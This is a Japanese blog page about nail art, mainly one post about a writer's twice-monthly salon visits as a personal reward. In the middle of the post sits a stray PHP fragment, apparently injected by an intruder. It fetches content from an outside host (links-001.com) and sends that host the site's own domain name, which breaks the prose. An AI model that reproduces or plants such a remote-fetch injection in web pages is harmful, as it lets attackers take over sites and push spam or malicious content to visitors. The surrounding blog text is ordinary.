前へ
次へ

ネイルの基本的な塗り方

ネイルは正しい塗り方をすると、自宅でもかなり仕上がりが変わってきます。
まず下地としてベースコ

more

ネイルのデザインに驚かされました

最近SNSを見ていたら、かなり立体的なネイルのデザインが紹介されていました。
誰かの顔の様でし

more

ネイルに対する意思表示をチェック

ネイルサロンを利用する人もいれば、セルフネイルで十分という人もいますし、一度もマニキュアをしたことが

more

自分へのご褒美としてのネイルアート

仕事をしていると時々自分へのご褒美を挙げたくなります。
そうすることで仕事のモチベーションを高めることが出来るからです。
その一つに、1ヶ月に2回のネイルサロンの利用があります。
行きつけのサロンがあって、馴染みの担当者がいるので、いつも指名をして施術を受けるようにしています。
自分の担当者はセンスが良く、自分の要望をよく訊いて形にしてくれるので、毎回仕上がりの素晴らしさにため息が出てしまうほど美しいです。
月に2回とすることで、自分のイメージを変えることができます。
もちろん、仕事の関係上あまり派手なものはご法度ではありますが、それでも毎回サロンへ行く時には、どのようなデザインにしようかとワクワクするものです。
デザインやカラーはその時の気分で決めたり、予め画像を用意しておいて、イメージを担当のネイリストに伝えます。
それを具体化してくれるのが、ネイリストの仕事なので、大まかに伝えたあとは任せています。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

ネイルを変えることで気分が一新され、仕事へのモチベーションが高まります。
また、指先にまで気を配ることで女子力が高まった気分になるのです。
職場の人や友人にネイルのことを褒めて貰った時には、とても嬉しい気持ちになります。
特に、デザインが気に入っている時には他人から褒めてもらえるとかなり気分が上がるのです。
仕事ではパソコン作業がほとんどなので、指先がきれいになっていると仕事にもやる気が出てきます。
ネイルに掛ける費用は、1ヶ月あたり数万円程度で消して安いわけではありません。
それでもこの習慣をやめることはできません。
やはりプロのネイリストに施術をしてもらったほうが仕上がりが美しく、見た目もきれいなので自分でなんとかしようという気は起こりません。
技術台とデザイン料だと考えて、毎月数万円を指先に費やしています。
甘皮処理も自分でやるときれいに仕上がらないので、定期的にサロンにてお願いしているのであります。

Page Top